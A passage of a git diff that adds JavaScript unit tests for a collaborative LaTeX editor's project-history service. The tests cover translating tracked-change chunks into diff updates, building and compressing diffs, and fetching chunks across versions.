He[ll]o planet world, [this] is a test + 20, + { + r: 4, + tracking: { + type: 'delete', + userId: this.author1.id, + ts: this.date.toISOString(), + }, + }, + 10, + ], + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + operations: [ + { + pathname: 'main.tex', + textOperation: [ + // [...] is a tracked delete + // {...} is a tracked insert + // He[ll]o planet world, [this] {TEST }is a test + 25, + { + i: 'TEST ', + tracking: { + type: 'insert', + userId: this.author1.id, + ts: this.date.toISOString(), + }, + }, + 9, + ], + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + operations: [ + { + pathname: 'main.tex', + textOperation: [ + // [...] 
is a tracked delete + // {...} is a tracked insert + 2, // He|[ll]o planet world, [this] {TEST }is a test + -2, // He|o planet world, [this] {TEST }is a test + { + r: 39, + tracking: { type: 'none' }, + }, + ], // He|o planet world, this TEST is a test + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + ], + }, + }, + authors: [this.author1.id], + } + + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 0, + 4, + (error, diff) => { + expect(error).to.be.null + expect(diff.updates).to.deep.equal([ + { + op: [ + { + d: 'll', + p: 2, + }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + { + op: [ + { + d: 'this', + p: 18, + }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 1, + }, + { + op: [ + { + i: 'TEST ', + p: 19, + }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 2, + }, + { + op: [ + { + i: 'this', + p: 18, + }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 3, + }, + ]) + done() + } + ) + }) + + it('should handle deletion that starts before tracked delete', function (done) { + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + stringLength: 34, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'main.tex', + textOperation: [ + // [...] is a tracked delete + // Hello planet world, [this] is a test + 20, + { + r: 4, + tracking: { + type: 'delete', + userId: this.author1.id, + ts: this.date.toISOString(), + }, + }, + 10, + ], + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + operations: [ + { + pathname: 'main.tex', + textOperation: [ + // [...] 
is a tracked delete
+ 5, // Hello| planet world, [this] is a test
+ -25, // Hellotest
+ 4,
+ ],
+ },
+ ],
+ timestamp: this.date.toISOString(),
+ authors: [this.author1.id],
+ },
+ ],
+ },
+ },
+ authors: [this.author1.id],
+ }
+
+ this.ChunkTranslator.convertToDiffUpdates(
+ this.projectId,
+ this.chunk,
+ 'main.tex',
+ 0,
+ 2,
+ (error, diff) => {
+ expect(error).to.be.null
+ expect(diff.updates).to.deep.equal([
+ {
+ op: [
+ {
+ d: 'this',
+ p: 20,
+ },
+ ],
+ meta: {
+ users: [this.author1.id],
+ start_ts: this.date.getTime(),
+ end_ts: this.date.getTime(),
+ },
+ v: 0,
+ },
+ {
+ op: [
+ {
+ d: ' planet world, ',
+ p: 5,
+ },
+ {
+ d: ' is a ',
+ p: 5,
+ },
+ ],
+ meta: {
+ users: [this.author1.id],
+ start_ts: this.date.getTime(),
+ end_ts: this.date.getTime(),
+ },
+ v: 1,
+ },
+ ])
+ done()
+ }
+ )
+ })
+
+ describe('with multiple tracked deletes', function () {
+ beforeEach(function () {
+ this.fileContents = 'Hello planet world universe, this is a test'
+ this.ranges = JSON.stringify({
+ trackedChanges: [
+ {
+ range: { pos: 6, length: 7 },
+ tracking: {
+ type: 'delete',
+ userId: this.author1.id,
+ ts: '2024-01-01T00:00:00.000Z',
+ },
+ },
+ {
+ range: { pos: 18, length: 9 },
+ tracking: {
+ type: 'delete',
+ userId: this.author1.id,
+ ts: '2024-01-01T00:00:00.000Z',
+ },
+ },
+ ],
+ })
+ this.HistoryStoreManager.getProjectBlob
+ .withArgs(this.historyId, this.rangesHash)
+ .yields(null, this.ranges)
+ this.HistoryStoreManager.getProjectBlob
+ .withArgs(this.historyId, this.fileHash)
+ .yields(null, this.fileContents)
+ })
+
+ it('should handle a deletion that spans multiple tracked deletes', function (done) {
+ this.chunk = {
+ chunk: {
+ startVersion: 0,
+ history: {
+ snapshot: {
+ files: {
+ 'main.tex': {
+ hash: this.fileHash,
+ rangesHash: this.rangesHash,
+ stringLength: this.fileContents.length,
+ },
+ },
+ },
+ changes: [
+ {
+ operations: [
+ {
+ pathname: 'main.tex',
+ textOperation: [
+ // [...] is a tracked delete
+ 6, // Hello |[planet ]world[ universe], this is a test
+ -21, // Hello|, this is a test
+ 16,
+ ],
+ },
+ ],
+ timestamp: this.date.toISOString(),
+ authors: [this.author1.id],
+ },
+ ],
+ },
+ },
+ authors: [this.author1.id],
+ }
+
+ this.ChunkTranslator.convertToDiffUpdates(
+ this.projectId,
+ this.chunk,
+ 'main.tex',
+ 0,
+ 1,
+ (error, diff) => {
+ expect(error).to.be.null
+ expect(diff.updates).to.deep.equal([
+ {
+ op: [
+ {
+ d: 'world',
+ p: 6,
+ },
+ ],
+ meta: {
+ users: [this.author1.id],
+ start_ts: this.date.getTime(),
+ end_ts: this.date.getTime(),
+ },
+ v: 0,
+ },
+ ])
+ done()
+ }
+ )
+ })
+
+ it('should handle a tracked deletion that spans multiple tracked deletes', function (done) {
+ this.chunk = {
+ chunk: {
+ startVersion: 0,
+ history: {
+ snapshot: {
+ files: {
+ 'main.tex': {
+ hash: this.fileHash,
+ rangesHash: this.rangesHash,
+ stringLength: this.fileContents.length,
+ },
+ },
+ },
+ changes: [
+ {
+ operations: [
+ {
+ pathname: 'main.tex',
+ textOperation: [
+ // [...]
is a tracked delete + 6, // Hello |[planet ]world[ universe], this is a test + { + r: 21, + tracking: { + type: 'delete', + userId: this.author1.id, + ts: '2024-01-01T00:00:00.000Z', + }, + }, // Hello [planet world universe]|, this is a test + 16, + ], + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + ], + }, + }, + authors: [this.author1.id], + } + + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 0, + 1, + (error, diff) => { + expect(error).to.be.null + expect(diff.updates).to.deep.equal([ + { + op: [ + { + d: 'world', + p: 6, + }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + ]) + done() + } + ) + }) + }) + }) + }) +}) diff --git a/services/project-history/test/unit/js/DiffGenerator/DiffGeneratorTests.js b/services/project-history/test/unit/js/DiffGenerator/DiffGeneratorTests.js new file mode 100644 index 0000000..251ddb3 --- /dev/null +++ b/services/project-history/test/unit/js/DiffGenerator/DiffGeneratorTests.js @@ -0,0 +1,395 @@ +import sinon from 'sinon' +import { expect } from 'chai' +import { strict as esmock } from 'esmock' + +const MODULE_PATH = '../../../../app/js/DiffGenerator.js' + +describe('DiffGenerator', function () { + beforeEach(async function () { + this.DiffGenerator = await esmock(MODULE_PATH, {}) + this.ts = Date.now() + this.user_id = 'mock-user-id' + this.user_id_2 = 'mock-user-id-2' + this.meta = { + start_ts: this.ts, + end_ts: this.ts, + user_id: this.user_id, + } + }) + + describe('buildDiff', function () { + beforeEach(function () { + this.diff = [{ u: 'mock-diff' }] + this.content = 'Hello world' + this.updates = [ + { i: 'mock-update-1' }, + { i: 'mock-update-2' }, + { i: 'mock-update-3' }, + ] + this.DiffGenerator._mocks.applyUpdateToDiff = sinon + .stub() + .returns(this.diff) + this.DiffGenerator._mocks.compressDiff = sinon.stub().returns(this.diff) + this.result = this.DiffGenerator.buildDiff(this.content, this.updates) + }) + + it('should return the diff', function () { + this.result.should.deep.equal(this.diff) + }) + + it('should build the content into an initial diff', function () { + this.DiffGenerator._mocks.applyUpdateToDiff + .calledWith( + [ + { + u: this.content, + }, + ], + this.updates[0] + ) + .should.equal(true) + }) + + it('should apply each update', function () { + this.updates.map(update => + this.DiffGenerator._mocks.applyUpdateToDiff + .calledWith(sinon.match.any, update) + .should.equal(true) + ) + }) + + it('should compress the diff', function () { + this.DiffGenerator._mocks.compressDiff + .calledWith(this.diff) + .should.equal(true) + }) + }) + + describe('compressDiff', function () { + describe('with adjacent inserts with the same user id', function () { + it('should create one update with combined meta data and min/max timestamps', function () { + const diff = this.DiffGenerator.compressDiff([ + { + i: 'foo', + meta: { start_ts: 10, end_ts: 20, users: [this.user_id] }, + }, + { + i: 'bar', + meta: { start_ts: 5, end_ts: 15, users: [this.user_id] }, + }, + ]) + expect(diff).to.deep.equal([ + { + i: 'foobar', + meta: { start_ts: 5, end_ts: 20, users: [this.user_id] }, + }, + ]) + }) + }) + + describe('with adjacent inserts with different user ids', function () { + it('should leave the inserts unchanged', function () { + const input = [ + { + i: 'foo', + meta: { start_ts: 10, end_ts: 20, users: [this.user_id] }, + }, + { + i: 'bar', + meta: { start_ts: 5, end_ts: 15, users: 
[this.user_id_2] },
+ },
+ ]
+ const output = this.DiffGenerator.compressDiff(input)
+ expect(output).to.deep.equal(input)
+ })
+ })
+
+ describe('with adjacent deletes with the same user id', function () {
+ it('should create one update with combined meta data and min/max timestamps', function () {
+ const diff = this.DiffGenerator.compressDiff([
+ {
+ d: 'foo',
+ meta: { start_ts: 10, end_ts: 20, users: [this.user_id] },
+ },
+ {
+ d: 'bar',
+ meta: { start_ts: 5, end_ts: 15, users: [this.user_id] },
+ },
+ ])
+ expect(diff).to.deep.equal([
+ {
+ d: 'foobar',
+ meta: { start_ts: 5, end_ts: 20, users: [this.user_id] },
+ },
+ ])
+ })
+ })
+
+ describe('with adjacent deletes with different user ids', function () {
+ it('should leave the deletes unchanged', function () {
+ const input = [
+ {
+ d: 'foo',
+ meta: { start_ts: 10, end_ts: 20, users: [this.user_id] },
+ },
+ {
+ d: 'bar',
+ meta: { start_ts: 5, end_ts: 15, users: [this.user_id_2] },
+ },
+ ]
+ const output = this.DiffGenerator.compressDiff(input)
+ expect(output).to.deep.equal(input)
+ })
+ })
+
+ describe('with history resync updates', function () {
+ it('should keep only inserts and mark them as unchanged text', function () {
+ const input = [
+ { u: 'untracked text' },
+ {
+ i: 'inserted anonymously',
+ meta: { origin: { kind: 'history-resync' } },
+ },
+ {
+ d: 'deleted anonymously',
+ meta: { origin: { kind: 'history-resync' } },
+ },
+ ]
+ const output = this.DiffGenerator.compressDiff(input)
+ expect(output).to.deep.equal([
+ { u: 'untracked text' },
+ { u: 'inserted anonymously' },
+ ])
+ })
+ })
+ })
+
+ describe('applyUpdateToDiff', function () {
+ describe('an insert', function () {
+ it('should insert into the middle of (u)nchanged text', function () {
+ const diff = this.DiffGenerator.applyUpdateToDiff([{ u: 'foobar' }], {
+ op: [{ p: 3, i: 'baz' }],
+ meta: this.meta,
+ })
+ expect(diff).to.deep.equal([
+ { u: 'foo' },
+ { i: 'baz', meta: this.meta },
+ { u: 'bar' },
+ ])
+ })
+
+ it('should insert into the start of (u)nchanged text', function () {
+ const diff = this.DiffGenerator.applyUpdateToDiff([{ u: 'foobar' }], {
+ op: [{ p: 0, i: 'baz' }],
+ meta: this.meta,
+ })
+ expect(diff).to.deep.equal([
+ { i: 'baz', meta: this.meta },
+ { u: 'foobar' },
+ ])
+ })
+
+ it('should insert into the end of (u)nchanged text', function () {
+ const diff = this.DiffGenerator.applyUpdateToDiff([{ u: 'foobar' }], {
+ op: [{ p: 6, i: 'baz' }],
+ meta: this.meta,
+ })
+ expect(diff).to.deep.equal([
+ { u: 'foobar' },
+ { i: 'baz', meta: this.meta },
+ ])
+ })
+
+ it('should insert into the middle of (i)nserted text', function () {
+ const diff = this.DiffGenerator.applyUpdateToDiff(
+ [{ i: 'foobar', meta: this.meta }],
+ { op: [{ p: 3, i: 'baz' }], meta: this.meta }
+ )
+ expect(diff).to.deep.equal([
+ { i: 'foo', meta: this.meta },
+ { i: 'baz', meta: this.meta },
+ { i: 'bar', meta: this.meta },
+ ])
+ })
+
+ it('should not count deletes in the running length total', function () {
+ const diff = this.DiffGenerator.applyUpdateToDiff(
+ [{ d: 'deleted', meta: this.meta }, { u: 'foobar' }],
+ { op: [{ p: 3, i: 'baz' }], meta: this.meta }
+ )
+ expect(diff).to.deep.equal([
+ { d: 'deleted', meta: this.meta },
+ { u: 'foo' },
+ { i: 'baz', meta: this.meta },
+ { u: 'bar' },
+ ])
+ })
+ })
+
+ describe('a delete', function () {
+ describe('deleting unchanged text', function () {
+ it('should delete from the middle of (u)nchanged text', function () {
+ const diff = this.DiffGenerator.applyUpdateToDiff(
+ [{ u: 'foobazbar' }],
+ {
op: [{ p: 3, d: 'baz' }], meta: this.meta }
+ )
+ expect(diff).to.deep.equal([
+ { u: 'foo' },
+ { d: 'baz', meta: this.meta },
+ { u: 'bar' },
+ ])
+ })
+
+ it('should delete from the start of (u)nchanged text', function () {
+ const diff = this.DiffGenerator.applyUpdateToDiff(
+ [{ u: 'foobazbar' }],
+ { op: [{ p: 0, d: 'foo' }], meta: this.meta }
+ )
+ expect(diff).to.deep.equal([
+ { d: 'foo', meta: this.meta },
+ { u: 'bazbar' },
+ ])
+ })
+
+ it('should delete from the end of (u)nchanged text', function () {
+ const diff = this.DiffGenerator.applyUpdateToDiff(
+ [{ u: 'foobazbar' }],
+ { op: [{ p: 6, d: 'bar' }], meta: this.meta }
+ )
+ expect(diff).to.deep.equal([
+ { u: 'foobaz' },
+ { d: 'bar', meta: this.meta },
+ ])
+ })
+
+ it('should delete across multiple (u)nchanged text parts', function () {
+ const diff = this.DiffGenerator.applyUpdateToDiff(
+ [{ u: 'foo' }, { u: 'baz' }, { u: 'bar' }],
+ { op: [{ p: 2, d: 'obazb' }], meta: this.meta }
+ )
+ expect(diff).to.deep.equal([
+ { u: 'fo' },
+ { d: 'o', meta: this.meta },
+ { d: 'baz', meta: this.meta },
+ { d: 'b', meta: this.meta },
+ { u: 'ar' },
+ ])
+ })
+ })
+
+ describe('deleting inserts', function () {
+ it('should delete from the middle of (i)nserted text', function () {
+ const diff = this.DiffGenerator.applyUpdateToDiff(
+ [{ i: 'foobazbar', meta: this.meta }],
+ { op: [{ p: 3, d: 'baz' }], meta: this.meta }
+ )
+ expect(diff).to.deep.equal([
+ { i: 'foo', meta: this.meta },
+ { i: 'bar', meta: this.meta },
+ ])
+ })
+
+ it('should delete from the start of (i)nserted text', function () {
+ const diff = this.DiffGenerator.applyUpdateToDiff(
+ [{ i: 'foobazbar', meta: this.meta }],
+ { op: [{ p: 0, d: 'foo' }], meta: this.meta }
+ )
+ expect(diff).to.deep.equal([{ i: 'bazbar', meta: this.meta }])
+ })
+
+ it('should delete from the end of (i)nserted text', function () {
+ const diff = this.DiffGenerator.applyUpdateToDiff(
+ [{ i: 'foobazbar', meta: this.meta }],
+ { op: [{ p: 6, d: 'bar' }], meta: this.meta }
+ )
+ expect(diff).to.deep.equal([{ i: 'foobaz', meta: this.meta }])
+ })
+
+ it('should delete across multiple (u)nchanged and (i)nserted text parts', function () {
+ const diff = this.DiffGenerator.applyUpdateToDiff(
+ [{ u: 'foo' }, { i: 'baz', meta: this.meta }, { u: 'bar' }],
+ { op: [{ p: 2, d: 'obazb' }], meta: this.meta }
+ )
+ expect(diff).to.deep.equal([
+ { u: 'fo' },
+ { d: 'o', meta: this.meta },
+ { d: 'b', meta: this.meta },
+ { u: 'ar' },
+ ])
+ })
+ })
+
+ describe('deleting over existing deletes', function () {
+ it('should delete across multiple (u)nchanged and (d)eleted text parts', function () {
+ const diff = this.DiffGenerator.applyUpdateToDiff(
+ [{ u: 'foo' }, { d: 'baz', meta: this.meta }, { u: 'bar' }],
+ { op: [{ p: 2, d: 'ob' }], meta: this.meta }
+ )
+ expect(diff).to.deep.equal([
+ { u: 'fo' },
+ { d: 'o', meta: this.meta },
+ { d: 'baz', meta: this.meta },
+ { d: 'b', meta: this.meta },
+ { u: 'ar' },
+ ])
+ })
+ })
+
+ describe("deleting when the text doesn't match", function () {
+ it('should throw an error when deleting from the middle of (u)nchanged text', function () {
+ expect(() =>
+ this.DiffGenerator.applyUpdateToDiff([{ u: 'foobazbar' }], {
+ op: [{ p: 3, d: 'xxx' }],
+ meta: this.meta,
+ })
+ ).to.throw(this.DiffGenerator.ConsistencyError)
+ })
+
+ it('should throw an error when deleting from the start of (u)nchanged text', function () {
+ expect(() =>
+ this.DiffGenerator.applyUpdateToDiff([{ u: 'foobazbar' }], {
+ op: [{ p: 0, d: 'xxx' }],
+ meta: this.meta,
+ })
).to.throw(this.DiffGenerator.ConsistencyError) + }) + + it('should throw an error when deleting from the end of (u)nchanged text', function () { + expect(() => + this.DiffGenerator.applyUpdateToDiff([{ u: 'foobazbar' }], { + op: [{ p: 6, d: 'xxx' }], + meta: this.meta, + }) + ).to.throw(this.DiffGenerator.ConsistencyError) + }) + }) + + describe('when the last update in the existing diff is a delete', function () { + it('should insert the new update before the delete', function () { + const diff = this.DiffGenerator.applyUpdateToDiff( + [{ u: 'foo' }, { d: 'bar', meta: this.meta }], + { op: [{ p: 3, i: 'baz' }], meta: this.meta } + ) + expect(diff).to.deep.equal([ + { u: 'foo' }, + { i: 'baz', meta: this.meta }, + { d: 'bar', meta: this.meta }, + ]) + }) + }) + + describe('when the only update in the existing diff is a delete', function () { + it('should insert the new update after the delete', function () { + const diff = this.DiffGenerator.applyUpdateToDiff( + [{ d: 'bar', meta: this.meta }], + { op: [{ p: 0, i: 'baz' }], meta: this.meta } + ) + expect(diff).to.deep.equal([ + { d: 'bar', meta: this.meta }, + { i: 'baz', meta: this.meta }, + ]) + }) + }) + }) + }) +}) diff --git a/services/project-history/test/unit/js/DiffManager/DiffManagerTests.js b/services/project-history/test/unit/js/DiffManager/DiffManagerTests.js new file mode 100644 index 0000000..ba2c155 --- /dev/null +++ b/services/project-history/test/unit/js/DiffManager/DiffManagerTests.js @@ -0,0 +1,523 @@ +import sinon from 'sinon' +import { expect } from 'chai' +import { strict as esmock } from 'esmock' + +const MODULE_PATH = '../../../../app/js/DiffManager.js' + +describe('DiffManager', function () { + beforeEach(async function () { + this.DocumentUpdaterManager = {} + this.DiffGenerator = { + buildDiff: sinon.stub(), + } + this.UpdatesProcessor = { + processUpdatesForProject: sinon.stub(), + } + this.HistoryStoreManager = { + getChunkAtVersion: sinon.stub(), + } + this.WebApiManager = { + getHistoryId: sinon.stub(), + } + this.ChunkTranslator = { + convertToDiffUpdates: sinon.stub(), + } + this.FileTreeDiffGenerator = {} + this.DiffManager = await esmock(MODULE_PATH, { + '../../../../app/js/DocumentUpdaterManager.js': + this.DocumentUpdaterManager, + '../../../../app/js/DiffGenerator.js': this.DiffGenerator, + '../../../../app/js/UpdatesProcessor.js': this.UpdatesProcessor, + '../../../../app/js/HistoryStoreManager.js': this.HistoryStoreManager, + '../../../../app/js/WebApiManager.js': this.WebApiManager, + '../../../../app/js/ChunkTranslator.js': this.ChunkTranslator, + '../../../../app/js/FileTreeDiffGenerator.js': this.FileTreeDiffGenerator, + }) + this.projectId = 'mock-project-id' + this.callback = sinon.stub() + }) + + describe('getDiff', function () { + beforeEach(function () { + this.pathname = 'main.tex' + this.fromVersion = 4 + this.toVersion = 8 + this.initialContent = 'foo bar baz' + this.updates = ['mock-updates'] + this.diff = { mock: 'dif' } + this.UpdatesProcessor.processUpdatesForProject + .withArgs(this.projectId) + .yields() + this.DiffGenerator.buildDiff + .withArgs(this.initialContent, this.updates) + .returns(this.diff) + }) + + describe('with a text file', function () { + beforeEach(function () { + this.DiffManager._mocks._getProjectUpdatesBetweenVersions = sinon.stub() + this.DiffManager._mocks._getProjectUpdatesBetweenVersions + .withArgs( + this.projectId, + this.pathname, + this.fromVersion, + this.toVersion + ) + .yields(null, { + initialContent: this.initialContent, + updates: this.updates, + 
})
+ this.DiffManager.getDiff(
+ this.projectId,
+ this.pathname,
+ this.fromVersion,
+ this.toVersion,
+ this.callback
+ )
+ })
+
+ it('should make sure all pending updates have been processed', function () {
+ this.UpdatesProcessor.processUpdatesForProject
+ .calledWith(this.projectId)
+ .should.equal(true)
+ })
+
+ it('should get the updates from the history backend', function () {
+ this.DiffManager._mocks._getProjectUpdatesBetweenVersions
+ .calledWith(
+ this.projectId,
+ this.pathname,
+ this.fromVersion,
+ this.toVersion
+ )
+ .should.equal(true)
+ })
+
+ it('should convert the updates to a diff', function () {
+ this.DiffGenerator.buildDiff
+ .calledWith(this.initialContent, this.updates)
+ .should.equal(true)
+ })
+
+ it('should return the diff', function () {
+ this.callback.calledWith(null, this.diff).should.equal(true)
+ })
+ })
+
+ describe('with a binary file', function () {
+ beforeEach(function () {
+ this.DiffManager._mocks._getProjectUpdatesBetweenVersions = sinon.stub()
+ this.DiffManager._mocks._getProjectUpdatesBetweenVersions
+ .withArgs(
+ this.projectId,
+ this.pathname,
+ this.fromVersion,
+ this.toVersion
+ )
+ .yields(null, { binary: true })
+ this.DiffManager.getDiff(
+ this.projectId,
+ this.pathname,
+ this.fromVersion,
+ this.toVersion,
+ this.callback
+ )
+ })
+
+ it('should make sure all pending updates have been processed', function () {
+ this.UpdatesProcessor.processUpdatesForProject
+ .calledWith(this.projectId)
+ .should.equal(true)
+ })
+
+ it('should get the updates from the history backend', function () {
+ this.DiffManager._mocks._getProjectUpdatesBetweenVersions
+ .calledWith(
+ this.projectId,
+ this.pathname,
+ this.fromVersion,
+ this.toVersion
+ )
+ .should.equal(true)
+ })
+
+ it('should not try to convert any updates to a diff', function () {
+ this.DiffGenerator.buildDiff.called.should.equal(false)
+ })
+
+ it('should return the binary diff', function () {
+ this.callback.calledWith(null, { binary: true }).should.equal(true)
+ })
+ })
+ })
+
+ describe('_getProjectUpdatesBetweenVersions', function () {
+ beforeEach(function () {
+ this.pathname = 'main.tex'
+ this.fromVersion = 4
+ this.toVersion = 8
+ this.chunks = ['mock-chunk-1', 'mock-chunk-2']
+ this.concatted_chunk = 'mock-chunk'
+ this.DiffManager._mocks._concatChunks = sinon.stub()
+ this.DiffManager._mocks._concatChunks
+ .withArgs(this.chunks)
+ .returns(this.concatted_chunk)
+ this.updates = ['mock-updates']
+ this.initialContent = 'foo bar baz'
+ this.ChunkTranslator.convertToDiffUpdates
+ .withArgs(
+ this.projectId,
+ this.concatted_chunk,
+ this.pathname,
+ this.fromVersion,
+ this.toVersion
+ )
+ .yields(null, {
+ initialContent: this.initialContent,
+ updates: this.updates,
+ })
+ })
+
+ describe('for the normal case', function () {
+ beforeEach(function () {
+ this.DiffManager._mocks._getChunks = sinon.stub()
+ this.DiffManager._mocks._getChunks
+ .withArgs(this.projectId, this.fromVersion, this.toVersion)
+ .yields(null, this.chunks)
+ this.DiffManager._getProjectUpdatesBetweenVersions(
+ this.projectId,
+ this.pathname,
+ this.fromVersion,
+ this.toVersion,
+ this.callback
+ )
+ })
+
+ it('should get the relevant chunks', function () {
+ this.DiffManager._mocks._getChunks
+ .calledWith(this.projectId, this.fromVersion, this.toVersion)
+ .should.equal(true)
+ })
+
+ it('should concat the chunks', function () {
+ this.DiffManager._mocks._concatChunks
+ .calledWith(this.chunks)
+ .should.equal(true)
+ })
+
+ it('should convert the chunks to an initial version and updates', function () {
+ this.ChunkTranslator.convertToDiffUpdates
+ .calledWith(
+ this.projectId,
+ this.concatted_chunk,
+ this.pathname,
+ this.fromVersion,
+ this.toVersion
+ )
+ .should.equal(true)
+ })
+
+ it('should return the initialContent and updates', function () {
+ this.callback
+ .calledWith(null, {
+ initialContent: this.initialContent,
+ updates: this.updates,
+ })
+ .should.equal(true)
+ })
+ })
+
+ describe('for the error case', function () {
+ beforeEach(function () {
+ this.DiffManager._mocks._getChunks = sinon.stub()
+ this.DiffManager._mocks._getChunks
+ .withArgs(this.projectId, this.fromVersion, this.toVersion)
+ .yields(new Error('failed to load chunk'))
+ this.DiffManager._getProjectUpdatesBetweenVersions(
+ this.projectId,
+ this.pathname,
+ this.fromVersion,
+ this.toVersion,
+ this.callback
+ )
+ })
+
+ it('should call the callback with an error', function () {
+ this.callback
+ .calledWith(sinon.match.instanceOf(Error))
+ .should.equal(true)
+ })
+ })
+ })
+
+ describe('_getChunks', function () {
+ beforeEach(function () {
+ this.historyId = 'mock-overleaf-id'
+ this.WebApiManager.getHistoryId.yields(null, this.historyId)
+ })
+
+ describe('where only one chunk is needed', function () {
+ beforeEach(function (done) {
+ this.fromVersion = 4
+ this.toVersion = 8
+ this.chunk = {
+ chunk: {
+ startVersion: 2,
+ }, // before fromVersion
+ }
+ this.HistoryStoreManager.getChunkAtVersion
+ .withArgs(this.projectId, this.historyId, this.toVersion)
+ .yields(null, this.chunk)
+ this.DiffManager._getChunks(
+ this.projectId,
+ this.fromVersion,
+ this.toVersion,
+ (error, chunks) => {
+ this.error = error
+ this.chunks = chunks
+ done()
+ }
+ )
+ })
+
+ it("should get the project's overleaf id", function () {
+ this.WebApiManager.getHistoryId
+ .calledWith(this.projectId)
+ .should.equal(true)
+ })
+
+ it('should request the first chunk', function () {
+ this.HistoryStoreManager.getChunkAtVersion
+ .calledWith(this.projectId, this.historyId, this.toVersion)
+ .should.equal(true)
+ })
+
+ it('should return an array of chunks', function () {
+ expect(this.chunks).to.deep.equal([this.chunk])
+ })
+ })
+
+ describe('where multiple chunks are needed', function () {
+ beforeEach(function (done) {
+ this.fromVersion = 4
+ this.toVersion = 8
+ this.chunk1 = {
+ chunk: {
+ startVersion: 6,
+ },
+ }
+ this.chunk2 = {
+ chunk: {
+ startVersion: 2,
+ },
+ }
+ this.HistoryStoreManager.getChunkAtVersion
+ .withArgs(this.projectId, this.historyId, this.toVersion)
+ .yields(null, this.chunk1)
+ this.HistoryStoreManager.getChunkAtVersion
+ .withArgs(
+ this.projectId,
+ this.historyId,
+ this.chunk1.chunk.startVersion
+ )
+ .yields(null, this.chunk2)
+ this.DiffManager._mocks._getChunks(
+ this.projectId,
+ this.fromVersion,
+ this.toVersion,
+ (error, chunks) => {
+ this.error = error
+ this.chunks = chunks
+ done()
+ }
+ )
+ })
+
+ it('should request the first chunk', function () {
+ this.HistoryStoreManager.getChunkAtVersion
+ .calledWith(this.projectId, this.historyId, this.toVersion)
+ .should.equal(true)
+ })
+
+ it('should request the second chunk, from where the first one started', function () {
+ this.HistoryStoreManager.getChunkAtVersion
+ .calledWith(
+ this.projectId,
+ this.historyId,
+ this.chunk1.chunk.startVersion
+ )
+ .should.equal(true)
+ })
+
+ it('should return an array of chunks', function () {
+ expect(this.chunks).to.deep.equal([this.chunk1, this.chunk2])
+ })
+ })
+
+ describe('where more than MAX_CHUNKS are requested', function () {
+ beforeEach(function (done) {
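+ // Reaching fromVersion 0 from toVersion 8 needs three chunks
+ // (startVersion 6, 4 and 2), but setMaxChunkRequests(2) below caps
+ // the traversal, so _getChunks is expected to fail with
+ // 'Diff spans too many chunks' rather than fetch a third chunk.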
+ this.fromVersion = 0 + this.toVersion = 8 + this.chunk1 = { + chunk: { + startVersion: 6, + }, + } + this.chunk2 = { + chunk: { + startVersion: 4, + }, + } + this.chunk3 = { + chunk: { + startVersion: 2, + }, + } + this.DiffManager.setMaxChunkRequests(2) + this.HistoryStoreManager.getChunkAtVersion + .withArgs(this.projectId, this.historyId, this.toVersion) + .yields(null, this.chunk1) + this.HistoryStoreManager.getChunkAtVersion + .withArgs( + this.projectId, + this.historyId, + this.chunk1.chunk.startVersion + ) + .yields(null, this.chunk2) + this.DiffManager._mocks._getChunks( + this.projectId, + this.fromVersion, + this.toVersion, + (error, chunks) => { + this.error = error + this.chunks = chunks + done() + } + ) + }) + + it('should request the first chunk', function () { + this.HistoryStoreManager.getChunkAtVersion + .calledWith(this.projectId, this.historyId, this.toVersion) + .should.equal(true) + }) + + it('should request the second chunk, from where the first one started', function () { + this.HistoryStoreManager.getChunkAtVersion + .calledWith( + this.projectId, + this.historyId, + this.chunk1.chunk.startVersion + ) + .should.equal(true) + }) + + it('should not request the third chunk', function () { + this.HistoryStoreManager.getChunkAtVersion + .calledWith( + this.projectId, + this.historyId, + this.chunk2.chunk.startVersion + ) + .should.equal(false) + }) + + it('should return an error', function () { + expect(this.error).to.exist + expect(this.error.message).to.equal('Diff spans too many chunks') + expect(this.error.name).to.equal('BadRequestError') + }) + }) + + describe('where fromVersion == toVersion', function () { + beforeEach(function (done) { + this.fromVersion = 4 + this.toVersion = 4 + this.chunk = { + chunk: { + startVersion: 2, + }, // before fromVersion + } + this.HistoryStoreManager.getChunkAtVersion + .withArgs(this.projectId, this.historyId, this.toVersion) + .yields(null, this.chunk) + this.DiffManager._mocks._getChunks( + this.projectId, + this.fromVersion, + this.toVersion, + (error, chunks) => { + this.error = error + this.chunks = chunks + done() + } + ) + }) + + it('should still request the first chunk (because we need the file contents)', function () { + this.HistoryStoreManager.getChunkAtVersion + .calledWith(this.projectId, this.historyId, this.toVersion) + .should.equal(true) + }) + + it('should return an array of chunks', function () { + expect(this.chunks).to.deep.equal([this.chunk]) + }) + }) + }) + + describe('_concatChunks', function () { + it('should concat the chunks in reverse order', function () { + const result = this.DiffManager._mocks._concatChunks([ + { + chunk: { + history: { + snapshot: { + files: { + mock: 'files-updated-2', + }, + }, + changes: [7, 8, 9], + }, + }, + }, + { + chunk: { + history: { + snapshot: { + files: { + mock: 'files-updated', + }, + }, + changes: [4, 5, 6], + }, + }, + }, + { + chunk: { + history: { + snapshot: { + files: { + mock: 'files-original', + }, + }, + changes: [1, 2, 3], + }, + }, + }, + ]) + + expect(result).to.deep.equal({ + chunk: { + history: { + snapshot: { + files: { + mock: 'files-original', + }, + }, + changes: [1, 2, 3, 4, 5, 6, 7, 8, 9], + }, + }, + }) + }) + }) +}) diff --git 